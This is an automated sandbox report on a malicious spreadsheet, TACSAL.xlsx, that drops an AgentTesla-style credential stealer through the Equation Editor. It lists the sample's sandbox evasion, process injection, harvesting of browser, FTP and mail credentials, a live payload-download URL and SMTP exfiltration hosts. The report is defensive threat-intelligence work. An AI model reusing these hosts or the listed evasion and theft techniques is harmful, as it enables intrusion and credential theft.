Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: TACSAL.xlsx

Stream path 'EncryptedPackage' entropy: 7.9999208389 (max. 8.0)

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000004.00000002.2159933636.00000000023DA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2159922481.00000000023C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2736, type: MEMORY

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Users\Public\vbc.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Users\Public\vbc.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: vbc.exe, 00000004.00000002.2159933636.00000000023DA000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.2159933636.00000000023DA000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\Public\vbc.exe

Window / User API: threadDelayed 9649

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2300	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2712	Thread sleep time: -51785s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2892	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2956	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2960	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2960	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3012	Thread sleep count: 82 > 30	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3012	Thread sleep count: 9649 > 30	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2960	Thread sleep count: 107 > 30	Jump to behavior

Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: vbc.exe, 00000004.00000002.2159933636.00000000023DA000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2159933636.00000000023DA000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.2159933636.00000000023DA000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2159933636.00000000023DA000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Users\Public\vbc.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe			Jump to behavior

Source: vbc.exe, 00000005.00000002.2371071376.0000000000EC0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000005.00000002.2371071376.0000000000EC0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000005.00000002.2371071376.0000000000EC0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\Public\vbc.exe VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\Public\vbc.exe VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000005.00000002.2370560370.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2371263271.0000000002618000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2160179580.00000000033C8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2836, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2736, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2836, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000005.00000002.2370560370.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2371263271.0000000002618000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2160179580.00000000033C8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2836, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2736, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	Path Interception	Process Injection112	Disable or Modify Tools11	OS Credential Dumping2	File and Directory Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution13	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Deobfuscate/Decode Files or Information1	Credentials in Registry1	System Information Discovery114	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information31	Security Account Manager	Security Software Discovery211	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing2	NTDS	Virtualization/Sandbox Evasion13	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading111	LSA Secrets	Process Discovery2	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol132	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion13	Cached Domain Credentials	Application Window Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection112	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
TACSAL.xlsx	32%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\Public\vbc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
5.2.vbc.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1138205		Download File

Domains

Source	Detection	Scanner	Label	Link
suresb1sndyintercont.dns.army	4%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
http://suresb1sndyintercont.dns.army/receipst/winlog.exe	11%	Virustotal		Browse
http://suresb1sndyintercont.dns.army/receipst/winlog.exe	100%	Avira URL Cloud	malware
http://smtp.migeulez.com	0%	Avira URL Cloud	safe
http://GhlhtO.com	0%	Avira URL Cloud	safe
https://FTlR0ss5usK.net	0%	Avira URL Cloud	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
https://api.ipify.org%	0%	URL Reputation	safe
https://api.ipify.org%	0%	URL Reputation	safe
https://api.ipify.org%	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
us2.smtp.mailhostbox.com	208.91.199.225	true	false		high
suresb1sndyintercont.dns.army	103.153.76.181	true	true	4%, Virustotal, Browse	unknown
smtp.migeulez.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://suresb1sndyintercont.dns.army/receipst/winlog.exe	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://FTlR0ss5usK.net	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	vbc.exe, 00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://DynDns.comDynDNS	vbc.exe, 00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	vbc.exe, 00000005.00000002.2372183882.0000000005DF0000.00000002.00000001.sdmp	false		high
http://us2.smtp.mailhostbox.com	vbc.exe, 00000005.00000002.2371340918.00000000026D6000.00000004.00000001.sdmp	false		high
http://www.day.com/dam/1.0	E243FB15.emf.0.dr	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	vbc.exe, 00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://smtp.migeulez.com	vbc.exe, 00000005.00000002.2371340918.00000000026D6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://GhlhtO.com	vbc.exe, 00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ipify.org%GETMozilla/5.0	vbc.exe, 00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.%s.comPA	vbc.exe, 00000005.00000002.2372183882.0000000005DF0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	vbc.exe, 00000004.00000002.2159922481.00000000023C1000.00000004.00000001.sdmp	false		high
https://api.ipify.org%	vbc.exe, 00000005.00000002.2371263271.0000000002618000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	vbc.exe, 00000004.00000002.2160179580.00000000033C8000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2370560370.0000000000402000.00000040.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
208.91.198.143	unknown	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	true
208.91.199.225	unknown	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	false
103.153.76.181	unknown	unknown	134687	TWIDC-AS-APTWIDCLimitedHK	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	344848
Start date:	27.01.2021
Start time:	09:14:23
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	TACSAL.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winXLSX@6/8@8/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.2% (good quality ratio 0.2%) Quality average: 58.3% Quality standard deviation: 15.1%
HCA Information:	Successful, ratio: 100% Number of executed functions: 137 Number of non-executed functions: 4
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:15:09	API Interceptor	80x Sleep call for process: EQNEDT32.EXE modified
09:15:13	API Interceptor	949x Sleep call for process: vbc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
208.91.198.143	para.exe	Get hash	malicious	Browse
	SIC_9827906277.pdf.exe	Get hash	malicious	Browse
	HTMY-209871640.exe	Get hash	malicious	Browse
	Payment slip.exe	Get hash	malicious	Browse
	2Dd20YdQDR.exe	Get hash	malicious	Browse
	SPpfYOx5Ju.exe	Get hash	malicious	Browse
	Z1cfHQnsLw.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Packed2.42809.32039.exe	Get hash	malicious	Browse
	MTC74989-1-19-21.exe	Get hash	malicious	Browse
	IQzEWkxzNM.exe	Get hash	malicious	Browse
	72-XV-032_Valves.exe	Get hash	malicious	Browse
	sample2.exe	Get hash	malicious	Browse
	invoice No 8882.exe	Get hash	malicious	Browse
	DHL Delivery Confirmation.exe	Get hash	malicious	Browse
	Verify Email.exe	Get hash	malicious	Browse
	Statement of Account.doc	Get hash	malicious	Browse
	vsl particulars.exe	Get hash	malicious	Browse
	DHL Shipment Documents.exe	Get hash	malicious	Browse
	suk1MHq6DK.exe	Get hash	malicious	Browse
	Swift_advise.xlsx	Get hash	malicious	Browse
208.91.199.225	para.exe	Get hash	malicious	Browse
	Quotation Prices.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.PackedNET.519.20020.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Artemis707F61F6A223.exe	Get hash	malicious	Browse
	SOA.exe	Get hash	malicious	Browse
	SPpfYOx5Ju.exe	Get hash	malicious	Browse
	ezs8BPdIwM.exe	Get hash	malicious	Browse
	Order confirmation.xlsx	Get hash	malicious	Browse
	Groupo Dani Order_pdf.exe	Get hash	malicious	Browse
	Purchased Order.exe	Get hash	malicious	Browse
	NvS9UwcK3c.exe	Get hash	malicious	Browse
	Outstanding Invoices.exe	Get hash	malicious	Browse
	UAE CHEMEX RFQ.exe	Get hash	malicious	Browse
	Invoice.exe	Get hash	malicious	Browse
	AWB & Shipping Document.exe	Get hash	malicious	Browse
	MV. Double Miracle.exe	Get hash	malicious	Browse
	AWB & Shipping Document.exe	Get hash	malicious	Browse
	Shipping document.exe	Get hash	malicious	Browse
	FB-108N & FB-108NK #U8a62#U50f9 - #U7530#U52e4.exe	Get hash	malicious	Browse
	Ldz62seIo3.exe	Get hash	malicious	Browse
103.153.76.181	PRESUPUESTO.xlsx	Get hash	malicious	Browse	suresb1sndyintercont.dns.army/receipst/winlog.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
us2.smtp.mailhostbox.com	PO#21010028 - SYINDAC QT-00820_pdf.exe	Get hash	malicious	Browse	208.91.199.223
	para.exe	Get hash	malicious	Browse	208.91.199.225
	AWB 9899691012 TRACKING INFO_pdf.exe	Get hash	malicious	Browse	208.91.199.224
	para.exe	Get hash	malicious	Browse	208.91.199.224
	SIC_9827906277.pdf.exe	Get hash	malicious	Browse	208.91.198.143
	Quotation Prices.exe	Get hash	malicious	Browse	208.91.199.225
	SecuriteInfo.com.Trojan.PackedNET.519.20020.exe	Get hash	malicious	Browse	208.91.199.225
	SSE_SOA2021.doc	Get hash	malicious	Browse	208.91.198.143
	HTG-9066543.exe	Get hash	malicious	Browse	208.91.199.223
	New Order #21076.exe	Get hash	malicious	Browse	208.91.199.224
	HTMY-209871640.exe	Get hash	malicious	Browse	208.91.198.143
	SecuriteInfo.com.Artemis707F61F6A223.exe	Get hash	malicious	Browse	208.91.199.225
	New order.PDF.exe	Get hash	malicious	Browse	208.91.199.224
	SOA.exe	Get hash	malicious	Browse	208.91.199.225
	7xCBr7CChD.exe	Get hash	malicious	Browse	208.91.199.224
	Purchase Order no 7770022460.exe	Get hash	malicious	Browse	208.91.199.224
	Payment slip.exe	Get hash	malicious	Browse	208.91.198.143
	2Dd20YdQDR.exe	Get hash	malicious	Browse	208.91.198.143
	SPpfYOx5Ju.exe	Get hash	malicious	Browse	208.91.199.225
	ezs8BPdIwM.exe	Get hash	malicious	Browse	208.91.199.224
suresb1sndyintercont.dns.army	PRESUPUESTO.xlsx	Get hash	malicious	Browse	103.153.76.181

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TWIDC-AS-APTWIDCLimitedHK	Delivery Note Awd 35378383-84783933.exe	Get hash	malicious	Browse	103.153.182.50
	PRESUPUESTO.xlsx	Get hash	malicious	Browse	103.153.76.181
	Delivery Note Awd 3637368383-938937833.exe	Get hash	malicious	Browse	103.153.182.50
	9oUx9PzdSA.exe	Get hash	malicious	Browse	103.155.92.70
	PAYMENT DOCS.html	Get hash	malicious	Browse	103.153.182.184
	Delivery Note Awd 2837939373-840847474.exe	Get hash	malicious	Browse	103.153.182.50
	DTwcHU5qyI.exe	Get hash	malicious	Browse	103.153.215.41
	NormhjTcQb.exe	Get hash	malicious	Browse	103.158.117.234
	https://app.box.com/s/8kw08i72600qzu1i7qj2c537n90a2z20	Get hash	malicious	Browse	103.158.223.22
	https://fornitureee.ru/fvgt45fvdvrbtgevdc/?xujytrhamtion=456rgrfds427	Get hash	malicious	Browse	103.153.182.5
	https://www.canva.com/design/DAEPpAhiSBc/pVb5D_otLEjM848gOGNt8w/view?utm_content=DAEPpAhiSBc&utm_campaign=designshare&utm_medium=link&utm_source=publishsharelink	Get hash	malicious	Browse	103.153.182.5
	https://artparket24wru.ru/wbv45trvfdcergtgbfvd/?dfvbyu34gb=75446823	Get hash	malicious	Browse	103.153.182.184
